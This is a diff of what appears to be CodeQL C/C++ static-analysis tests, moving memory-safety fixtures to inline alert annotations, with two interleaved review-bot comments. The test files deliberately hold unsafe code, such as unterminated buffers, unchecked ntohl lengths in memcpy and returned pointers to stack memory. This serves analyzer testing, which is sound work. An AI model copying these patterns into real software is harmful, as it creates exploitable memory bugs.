@@ -299,7 +299,7 @@ void test_strcat() *buffer_ptr = 0; strcat(buffer1, "content"); // GOOD - strcat(buffer2, "content"); // BAD + strcat(buffer2, "content"); // BAD // $ Alert[cpp/improper-null-termination] strcat(buffer_ptr, "content"); // GOOD buffer_ptr = buffer2; @@ -311,7 +311,7 @@ void test_strcat() char *buffer_ptr = buffer; *buffer_ptr = 'a'; - strcat(buffer, "content"); // BAD + strcat(buffer, "content"); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -333,7 +333,7 @@ void test_strlen(bool cond1, bool cond2) { { char buffer[1024]; - int i = strlen(buffer); // BAD + int i = strlen(buffer); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -418,7 +418,7 @@ void test_strcpy() char buffer1[1024]; char buffer2[1024]; - strcpy(buffer1, buffer2); // BAD + strcpy(buffer1, buffer2); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -445,13 +445,13 @@ void test_wrappers() { char buffer[1024]; - strcatWrapper(buffer, "content"); // BAD + strcatWrapper(buffer, "content"); // BAD // $ Alert[cpp/improper-null-termination] } { char buffer[1024]; - strcatWrapper2(buffer, "content"); // BAD + strcatWrapper2(buffer, "content"); // BAD // $ Alert[cpp/improper-null-termination] } } @@ -463,7 +463,7 @@ void test_read_fread(int read_src, FILE *s) char buffer[buffer_size]; read(read_src, buffer, buffer_size * sizeof(char)); - strlen(buffer); // BAD + strlen(buffer); // BAD // $ Alert[cpp/user-controlled-null-termination-tainted] } { @@ -478,7 +478,7 @@ void test_read_fread(int read_src, FILE *s) char buffer[buffer_size]; fread(buffer, sizeof(char), buffer_size, s); - strlen(buffer); // BAD + strlen(buffer); // BAD // $ Alert[cpp/user-controlled-null-termination-tainted] } { 
@@ -510,13 +510,13 @@ void test_printf(char *str) { char buffer[1024]; - printf(buffer, ""); // BAD + printf(buffer, ""); // BAD // $ Alert[cpp/improper-null-termination] } { char buffer[1024]; - printf("%s", buffer); // BAD + printf("%s", buffer); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -555,7 +555,7 @@ void test_reassignment() strcpy(buffer_ptr, "content"); // null terminates buffer1 buffer_ptr = buffer2; - strdup(buffer2); // BAD + strdup(buffer2); // BAD // $ Alert[cpp/improper-null-termination] } { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/NtohlArrayNoBound.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/NtohlArrayNoBound.qlref index 58e62b13e6d6..d01f3942fc53 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/NtohlArrayNoBound.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/NtohlArrayNoBound.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/NtohlArrayNoBound.ql \ No newline at end of file +query: Likely Bugs/Memory Management/NtohlArrayNoBound.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/test.cpp index 24bdaee0f162..514dd72ca19a 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/test.cpp @@ -10,7 +10,7 @@ void test1(const char *source, size_t len) char buffer[256]; size_t len2 = ntohl(len); - memcpy(buffer, source, ntohl(len)); // BAD + memcpy(buffer, source, ntohl(len)); // BAD // $ Alert if (len2 < 256) { 
@@ -19,7 +19,7 @@ void test1(const char *source, size_t len) if (source != 0) { - memcpy(buffer, source, len2); // BAD + memcpy(buffer, source, len2); // BAD // $ Alert } if ((len2 < 256) && (source != 0)) @@ -29,7 +29,7 @@ void test1(const char *source, size_t len) if ((len2 < 256) || (source != 0)) { - memcpy(buffer, source, len2); // BAD + memcpy(buffer, source, len2); // BAD // $ Alert } if (len2 < 256) @@ -59,10 +59,10 @@ void test1(const char *source, size_t len) if (strlen(source) < 256) { - memcpy(buffer, source, len2); // BAD + memcpy(buffer, source, len2); // BAD // $ Alert } - buffer[len2] = 0; // BAD + buffer[len2] = 0; // BAD // $ Alert if (len2 < 256) { @@ -71,7 +71,7 @@ void test1(const char *source, size_t len) { unsigned short lens = len2; - buffer[lens] = 0; // BAD + buffer[lens] = 0; // BAD // $ Alert } if (len2 < 256) @@ -84,7 +84,7 @@ void test1(const char *source, size_t len) if (len3 < 256) { len3 = ntohl(len); - buffer[len3] = 0; // BAD + buffer[len3] = 0; // BAD // $ Alert } } @@ -92,7 +92,7 @@ void test2(size_t len) { char buffer[256]; - buffer[len] = 0; // BAD + buffer[len] = 0; // BAD // $ Alert } void test3(size_t len) @@ -104,5 +104,5 @@ int test4(const char *source, size_t len) { char buffer[256]; - return memcmp(buffer, source, ntohl(len)); // BAD + return memcmp(buffer, source, ntohl(len)); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/More64BitWaste.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/More64BitWaste.qlref index 614ac0198bec..48d907018a89 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/More64BitWaste.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/More64BitWaste.qlref 
@@ -1 +1,2 @@ -Likely Bugs/Memory Management/Padding/More64BitWaste.ql \ No newline at end of file +query: Likely Bugs/Memory Management/Padding/More64BitWaste.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/test.cpp index 0703d4dfe78e..c30d492d13bd 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/test.cpp @@ -14,7 +14,7 @@ struct test3 int x, y, z; }; -struct test4 // BAD +struct test4 // BAD // $ Alert { int a; long long b; @@ -26,7 +26,7 @@ struct test5 int b; }; -struct test6 // BAD +struct test6 // BAD // $ Alert { char as[4]; long long b; diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/NonPortablePrintf.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/NonPortablePrintf.qlref index ee9f4a7debb7..7ba5352553d7 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/NonPortablePrintf.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/NonPortablePrintf.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/Padding/NonPortablePrintf.ql \ No newline at end of file +query: Likely Bugs/Memory Management/Padding/NonPortablePrintf.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/test.cpp index e197819ba10f..7408440fa037 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/test.cpp 
+++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/test.cpp @@ -7,10 +7,10 @@ void test1() void *ptr; printf("%ld\n", l); // GOOD - printf("%d\n", l); // BAD + printf("%d\n", l); // BAD // $ Alert printf("%p\n", ptr); // GOOD - printf("%d\n", ptr); // BAD - printf("%u\n", ptr); // BAD - printf("%x\n", ptr); // BAD + printf("%d\n", ptr); // BAD // $ Alert + printf("%u\n", ptr); // BAD // $ Alert + printf("%x\n", ptr); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/Suboptimal64BitType.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/Suboptimal64BitType.qlref index 3ad68ed8cec5..26c576ecaf97 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/Suboptimal64BitType.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/Suboptimal64BitType.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/Padding/Suboptimal64BitType.ql \ No newline at end of file +query: Likely Bugs/Memory Management/Padding/Suboptimal64BitType.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/types.c b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/types.c index e4f86df394e2..14533d574971 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/types.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/types.c @@ -8,7 +8,7 @@ // - 6 bytes: char d[6] // - 2 bytes: trailing padding // Optimal layout removes 8 bytes padding, leaves 2 bytes trailing padding. -typedef struct a { +typedef struct a { // $ Alert int a; double b; int c; 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/PointerOverflow.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/PointerOverflow.qlref index 2cad0c8bd7f7..b24ce18e5839 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/PointerOverflow.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/PointerOverflow.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/PointerOverflow.ql +query: Likely Bugs/Memory Management/PointerOverflow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/test.cpp index f4d3dbfe1814..7baf2b138e8d 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/test.cpp @@ -3,7 +3,7 @@ bool check_pointer_overflow(P *ptr) { // x86-64 gcc 9.2 -O2: deleted // x86-64 clang 9.9.9 -O2: deleted // x64 msvc v19.22 /O2: not deleted - return ptr + 0x12345678 < ptr; // BAD + return ptr + 0x12345678 < ptr; // BAD // $ Alert } bool check_pointer_overflow(P *ptr, P *ptr_end) { // x86-64 gcc 9.2 -O2: not deleted @@ -30,7 +30,7 @@ typedef unsigned long size_t; bool not_in_range_bad(Q *ptr, Q *ptr_end, size_t a) { return ptr + a >= ptr_end || // GOOD (for the purpose of this test) - ptr + a < ptr; // BAD + ptr + a < ptr; // BAD // $ Alert } bool not_in_range_good(Q *ptr, Q *ptr_end, size_t a) { 
@@ -46,9 +46,9 @@ extern "C" void abort(void); #define MYASSERT(cond) if (cond) abort() void assert_not_in_range_bad(Q *ptr, Q *ptr_end, size_t a) { - MYASSERT(ptr + a >= ptr_end || ptr + a < ptr); // BAD + MYASSERT(ptr + a >= ptr_end || ptr + a < ptr); // BAD // $ Alert MYASSERT(ptr + a >= ptr_end); // GOOD (for the purpose of this test) - MYASSERT(ptr + a < ptr); // BAD + MYASSERT(ptr + a < ptr); // BAD // $ Alert } #define IS_LESS_THAN(lhs, rhs) ((lhs) < (rhs)) diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/ReturnCstrOfLocalStdString.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/ReturnCstrOfLocalStdString.qlref index e8864277b4fd..1921529a00be 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/ReturnCstrOfLocalStdString.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/ReturnCstrOfLocalStdString.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/ReturnCstrOfLocalStdString.ql +query: Likely Bugs/Memory Management/ReturnCstrOfLocalStdString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/test.cpp index c27cb77b1d89..9d34364339d2 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/test.cpp @@ -21,7 +21,7 @@ namespace std { const char* bad000() { std::string localStr("Test string"); - return localStr.c_str(); + return localStr.c_str(); // $ Alert } const char* good001(const std::string& p) { 
@@ -29,7 +29,7 @@ const char* good001(const std::string& p) { } const char* bad001() { - return std::string("Test string").c_str(); + return std::string("Test string").c_str(); // $ Alert } @@ -42,7 +42,7 @@ class _JNIEnv { jstring get_hello(_JNIEnv *env) { std::string hello = "Hello world"; - return env->NewStringUTF(hello.c_str()); + return env->NewStringUTF(hello.c_str()); // $ Alert } void good002_helper(std::string*); diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected index 6aa457b1e8a4..f53047761409 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected 
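Review bot: In the `@@ -42,7 +42,7 @@` hunk, the new `// $ Alert` on `return env->NewStringUTF(hello.c_str());` in `get_hello` pins a result with no BAD/GOOD comment, unlike `bad000` and `bad001`, whose names state the intent. The value returned here is the result of `NewStringUTF`, not the `c_str()` pointer itself, so a reader cannot tell whether this is an intended finding or a known false positive being recorded. If it is a false positive, the annotation should say so, e.g. `return env->NewStringUTF(hello.c_str()); // $ SPURIOUS: Alert`; otherwise add a short comment explaining why the alert is expected. The definition of `_JNIEnv::NewStringUTF` is outside the hunk, so this is inferred from the call shape only.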
@@ -1,3 +1,20 @@ +#select +| test.cpp:17:9:17:11 | CopyValue: & ... | test.cpp:17:10:17:11 | mc | test.cpp:17:9:17:11 | & ... | May return stack-allocated memory from $@. | test.cpp:17:10:17:11 | mc | mc | +| test.cpp:25:9:25:11 | Load: ptr | test.cpp:23:18:23:19 | mc | test.cpp:25:9:25:11 | ptr | May return stack-allocated memory from $@. | test.cpp:23:18:23:19 | mc | mc | +| test.cpp:41:9:41:12 | CopyValue: & ... | test.cpp:39:17:39:18 | mc | test.cpp:41:9:41:12 | & ... | May return stack-allocated memory from $@. | test.cpp:39:17:39:18 | mc | mc | +| test.cpp:47:9:47:10 | CopyValue: (reference to) | test.cpp:47:9:47:10 | mc | test.cpp:47:9:47:10 | (reference to) | May return stack-allocated memory from $@. | test.cpp:47:9:47:10 | mc | mc | +| test.cpp:54:9:54:15 | CopyValue: & ... | test.cpp:54:11:54:12 | mc | test.cpp:54:9:54:15 | & ... | May return stack-allocated memory from $@. | test.cpp:54:11:54:12 | mc | mc | +| test.cpp:92:9:92:11 | Load: ptr | test.cpp:89:10:89:11 | mc | test.cpp:92:9:92:11 | ptr | May return stack-allocated memory from $@. | test.cpp:89:10:89:11 | mc | mc | +| test.cpp:112:9:112:11 | Convert: array to pointer conversion | test.cpp:112:9:112:11 | arr | test.cpp:112:9:112:11 | array to pointer conversion | May return stack-allocated memory from $@. | test.cpp:112:9:112:11 | arr | arr | +| test.cpp:119:9:119:18 | CopyValue: & ... | test.cpp:119:11:119:13 | arr | test.cpp:119:9:119:18 | & ... | May return stack-allocated memory from $@. | test.cpp:119:11:119:13 | arr | arr | +| test.cpp:137:9:137:11 | Load: ptr | test.cpp:134:8:134:10 | arr | test.cpp:137:9:137:11 | ptr | May return stack-allocated memory from $@. | test.cpp:134:8:134:10 | arr | arr | +| test.cpp:171:10:171:23 | Load: pointerToLocal | test.cpp:170:35:170:41 | myLocal | test.cpp:171:10:171:23 | pointerToLocal | May return stack-allocated memory from $@. | test.cpp:170:35:170:41 | myLocal | myLocal | +| test.cpp:177:10:177:23 | Convert: (void *)... 
| test.cpp:176:25:176:34 | localArray | test.cpp:177:10:177:23 | (void *)... | May return stack-allocated memory from $@. | test.cpp:176:25:176:34 | localArray | localArray | +| test.cpp:183:10:183:19 | CopyValue: (reference to) | test.cpp:182:21:182:27 | myLocal | test.cpp:183:10:183:19 | (reference to) | May return stack-allocated memory from $@. | test.cpp:182:21:182:27 | myLocal | myLocal | +| test.cpp:190:10:190:13 | CopyValue: (reference to) | test.cpp:189:16:189:16 | p | test.cpp:190:10:190:13 | (reference to) | May return stack-allocated memory from $@. | test.cpp:189:16:189:16 | p | p | +| test.cpp:238:9:238:9 | Load: p | test.cpp:237:12:237:17 | call to alloca | test.cpp:238:9:238:9 | p | May return stack-allocated memory from $@. | test.cpp:237:12:237:17 | call to alloca | call to alloca | +| test.cpp:245:9:245:15 | Call: call to strdupa | test.cpp:245:9:245:15 | call to strdupa | test.cpp:245:9:245:15 | call to strdupa | May return stack-allocated memory from $@. | test.cpp:245:9:245:15 | call to strdupa | call to strdupa | +| test.cpp:250:9:250:10 | Convert: (void *)... | test.cpp:249:13:249:20 | call to strndupa | test.cpp:250:9:250:10 | (void *)... | May return stack-allocated memory from $@. | test.cpp:249:13:249:20 | call to strndupa | call to strndupa | edges | test.cpp:17:10:17:11 | mc | test.cpp:17:9:17:11 | & ... | | test.cpp:23:17:23:19 | & ... | test.cpp:23:17:23:19 | & ... | 
@@ -114,20 +131,3 @@ nodes | test.cpp:249:13:249:20 | call to strndupa | semmle.label | call to strndupa | | test.cpp:250:9:250:10 | (void *)... | semmle.label | (void *)... | | test.cpp:250:9:250:10 | s2 | semmle.label | s2 | -#select -| test.cpp:17:9:17:11 | CopyValue: & ... | test.cpp:17:10:17:11 | mc | test.cpp:17:9:17:11 | & ... | May return stack-allocated memory from $@. | test.cpp:17:10:17:11 | mc | mc | -| test.cpp:25:9:25:11 | Load: ptr | test.cpp:23:18:23:19 | mc | test.cpp:25:9:25:11 | ptr | May return stack-allocated memory from $@. | test.cpp:23:18:23:19 | mc | mc | -| test.cpp:41:9:41:12 | CopyValue: & ... | test.cpp:39:17:39:18 | mc | test.cpp:41:9:41:12 | & ... | May return stack-allocated memory from $@. | test.cpp:39:17:39:18 | mc | mc | -| test.cpp:47:9:47:10 | CopyValue: (reference to) | test.cpp:47:9:47:10 | mc | test.cpp:47:9:47:10 | (reference to) | May return stack-allocated memory from $@. | test.cpp:47:9:47:10 | mc | mc | -| test.cpp:54:9:54:15 | CopyValue: & ... | test.cpp:54:11:54:12 | mc | test.cpp:54:9:54:15 | & ... | May return stack-allocated memory from $@. | test.cpp:54:11:54:12 | mc | mc | -| test.cpp:92:9:92:11 | Load: ptr | test.cpp:89:10:89:11 | mc | test.cpp:92:9:92:11 | ptr | May return stack-allocated memory from $@. | test.cpp:89:10:89:11 | mc | mc | -| test.cpp:112:9:112:11 | Convert: array to pointer conversion | test.cpp:112:9:112:11 | arr | test.cpp:112:9:112:11 | array to pointer conversion | May return stack-allocated memory from $@. | test.cpp:112:9:112:11 | arr | arr | -| test.cpp:119:9:119:18 | CopyValue: & ... | test.cpp:119:11:119:13 | arr | test.cpp:119:9:119:18 | & ... | May return stack-allocated memory from $@. | test.cpp:119:11:119:13 | arr | arr | -| test.cpp:137:9:137:11 | Load: ptr | test.cpp:134:8:134:10 | arr | test.cpp:137:9:137:11 | ptr | May return stack-allocated memory from $@. 
| test.cpp:134:8:134:10 | arr | arr | -| test.cpp:171:10:171:23 | Load: pointerToLocal | test.cpp:170:35:170:41 | myLocal | test.cpp:171:10:171:23 | pointerToLocal | May return stack-allocated memory from $@. | test.cpp:170:35:170:41 | myLocal | myLocal | -| test.cpp:177:10:177:23 | Convert: (void *)... | test.cpp:176:25:176:34 | localArray | test.cpp:177:10:177:23 | (void *)... | May return stack-allocated memory from $@. | test.cpp:176:25:176:34 | localArray | localArray | -| test.cpp:183:10:183:19 | CopyValue: (reference to) | test.cpp:182:21:182:27 | myLocal | test.cpp:183:10:183:19 | (reference to) | May return stack-allocated memory from $@. | test.cpp:182:21:182:27 | myLocal | myLocal | -| test.cpp:190:10:190:13 | CopyValue: (reference to) | test.cpp:189:16:189:16 | p | test.cpp:190:10:190:13 | (reference to) | May return stack-allocated memory from $@. | test.cpp:189:16:189:16 | p | p | -| test.cpp:238:9:238:9 | Load: p | test.cpp:237:12:237:17 | call to alloca | test.cpp:238:9:238:9 | p | May return stack-allocated memory from $@. | test.cpp:237:12:237:17 | call to alloca | call to alloca | -| test.cpp:245:9:245:15 | Call: call to strdupa | test.cpp:245:9:245:15 | call to strdupa | test.cpp:245:9:245:15 | call to strdupa | May return stack-allocated memory from $@. | test.cpp:245:9:245:15 | call to strdupa | call to strdupa | -| test.cpp:250:9:250:10 | Convert: (void *)... | test.cpp:249:13:249:20 | call to strndupa | test.cpp:250:9:250:10 | (void *)... | May return stack-allocated memory from $@. | test.cpp:249:13:249:20 | call to strndupa | call to strndupa | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.qlref index 9ca456820068..f35aff41b04b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.qlref 
+++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/ReturnStackAllocatedMemory.ql +query: Likely Bugs/Memory Management/ReturnStackAllocatedMemory.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/test.cpp index 07e3520fa814..45d1431c04d4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/test.cpp @@ -14,15 +14,15 @@ MyClass *test1() { MyClass mc; - return &mc; // BAD + return &mc; // BAD // $ Alert } MyClass *test2() { MyClass mc; - MyClass *ptr = &mc; + MyClass *ptr = &mc; // $ Source - return ptr; // BAD + return ptr; // BAD // $ Alert } MyClass *test3() @@ -36,22 +36,22 @@ MyClass *test3() MyClass *test4() { MyClass mc; - MyClass &ref = mc; + MyClass &ref = mc; // $ Source - return &ref; // BAD + return &ref; // BAD // $ Alert } MyClass &test5() { MyClass mc; - return mc; // BAD + return mc; // BAD // $ Alert } int *test6() { MyClass mc; - return &(mc.a); // BAD + return &(mc.a); // BAD // $ Alert } MyClass test7() @@ -86,10 +86,10 @@ MyClass *test11() { MyClass mc; - ptr = &mc; + ptr = &mc; // $ Source } - return ptr; // BAD + return ptr; // BAD // $ Alert } MyClass *test12(MyClass *param) @@ -109,14 +109,14 @@ char *testArray1() { char arr[256]; - return arr; // BAD + return arr; // BAD // $ Alert } char *testArray2() { char arr[256]; - return &(arr[10]); // BAD + return &(arr[10]); // BAD // $ Alert } char testArray3() @@ -131,10 +131,10 @@ char *testArray4() char arr[256]; char *ptr; - ptr = arr + 1; + ptr = arr + 1; // $ Source ptr++; - return ptr; // BAD + return ptr; // BAD // $ Alert } char *testArray5() 
@@ -167,27 +167,27 @@ char *returnAfterCopy() { void *conversionBeforeDataFlow() { int myLocal; - void *pointerToLocal = (void *)&myLocal; // has conversion - return pointerToLocal; // BAD + void *pointerToLocal = (void *)&myLocal; // has conversion // $ Source + return pointerToLocal; // BAD // $ Alert } void *arrayConversionBeforeDataFlow() { int localArray[4]; - int *pointerToLocal = localArray; // has conversion - return pointerToLocal; // BAD + int *pointerToLocal = localArray; // has conversion // $ Source + return pointerToLocal; // BAD // $ Alert } int &dataFlowThroughReference() { int myLocal; - int &refToLocal = myLocal; // has conversion - return refToLocal; // BAD + int &refToLocal = myLocal; // has conversion // $ Source + return refToLocal; // BAD // $ Alert } int *&conversionInFlow() { int myLocal; int *p = &myLocal; - int *&pRef = p; // has conversion in the middle of data flow - return pRef; // BAD + int *&pRef = p; // has conversion in the middle of data flow // $ Source + return pRef; // BAD // $ Alert } namespace std { @@ -234,20 +234,20 @@ void f() { void *alloca(size_t); void* test_alloca() { - void* p = alloca(10); - return p; // BAD + void* p = alloca(10); // $ Source + return p; // BAD // $ Alert } char *strdupa(const char *); char *strndupa(const char *, size_t); char* test_strdupa(const char* s) { - return strdupa(s); // BAD + return strdupa(s); // BAD // $ Alert } void* test_strndupa(const char* s, size_t size) { - char* s2 = strndupa(s, size); - return s2; // BAD + char* s2 = strndupa(s, size); // $ Source + return s2; // BAD // $ Alert } int* f_rec(int *p) { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/StackAddressEscapes.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/StackAddressEscapes.qlref index 9442d89a36d5..c5fff4b22340 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/StackAddressEscapes.qlref 
+++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/StackAddressEscapes.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/StackAddressEscapes.ql \ No newline at end of file +query: Likely Bugs/Memory Management/StackAddressEscapes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/manager.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/manager.cpp index 8b73bffb04ab..02a67eb9761b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/manager.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/manager.cpp @@ -48,7 +48,7 @@ manager *test_managers() std::vector vs; a.set_strings(vs); // BAD: stack address `&vs` escapes [NOT DETECTED] - glob_man = &man; // BAD: stack address `&man` escapes + glob_man = &man; // BAD: stack address `&man` escapes // $ Alert return &man; // BAD: stack address `&man` escapes [NOT DETECTED] } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/test.cpp index 19cfd214e180..34717346978f 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/test.cpp @@ -19,7 +19,7 @@ int test101() { int x = 0; // BAD: local address is written to a static variable, which could // be unsafe. - s101.p = &x; + s101.p = &x; // $ Alert return x; } @@ -28,7 +28,7 @@ int test102() { static struct S100 s102; // BAD: local address is written to a local static variable, which could // be unsafe. - s102.p = &x; + s102.p = &x; // $ Alert return x; } 
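Review bot: In the manager.cpp hunk (`@@ -48,7 +48,7 @@`), only `glob_man = &man;` gets an inline expectation, while the two context lines marked `[NOT DETECTED]` (`a.set_strings(vs);` and `return &man;`) remain free-text comments. Now that inline expectations drive this test, those known false negatives could be recorded in the same machine-checked form, e.g. `a.set_strings(vs); // $ MISSING: Alert` and `return &man; // $ MISSING: Alert`, so that a later query improvement shows up as a test change rather than going unnoticed. `test_managers` begins before the hunk, so other lines in the function may need the same treatment.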
@@ -36,7 +36,7 @@ void test103(int *p) { static struct S100 s103; // BAD: address is written to a local static variable, which could // be unsafe. - s103.p = p; + s103.p = p; // $ Alert } // Helper for test103. @@ -75,7 +75,7 @@ int test105() { p3++; // BAD: local address is written to a static variable, which could // be unsafe. - s101.p = p3; + s101.p = p3; // $ Alert return x; } @@ -86,7 +86,7 @@ void test106() { S100 s; // BAD: local address is written to a static variable, which could // be unsafe. - s106.p = &(s.i); + s106.p = &(s.i); // $ Alert } // Test for reference types. @@ -97,7 +97,7 @@ int test107() { r1++; // BAD: local address is written to a static variable, which could // be unsafe. - s101.p = &r1; + s101.p = &r1; // $ Alert return r1; } @@ -124,7 +124,7 @@ int test201() { int x = 0; // BAD: local address is written to a static variable, which could // be unsafe. - s201.p = &x; + s201.p = &x; // $ Alert return x; } @@ -133,7 +133,7 @@ int test202() { static struct S200 s202; // BAD: local address is written to a local static variable, which could // be unsafe. - s202.p = &x; + s202.p = &x; // $ Alert return x; } @@ -142,7 +142,7 @@ static const int* xptr; void example1() { int x = 0; - xptr = &x; // BAD: address of local variable stored in non-local memory. + xptr = &x; // BAD: address of local variable stored in non-local memory. // $ Alert } void example2() { 
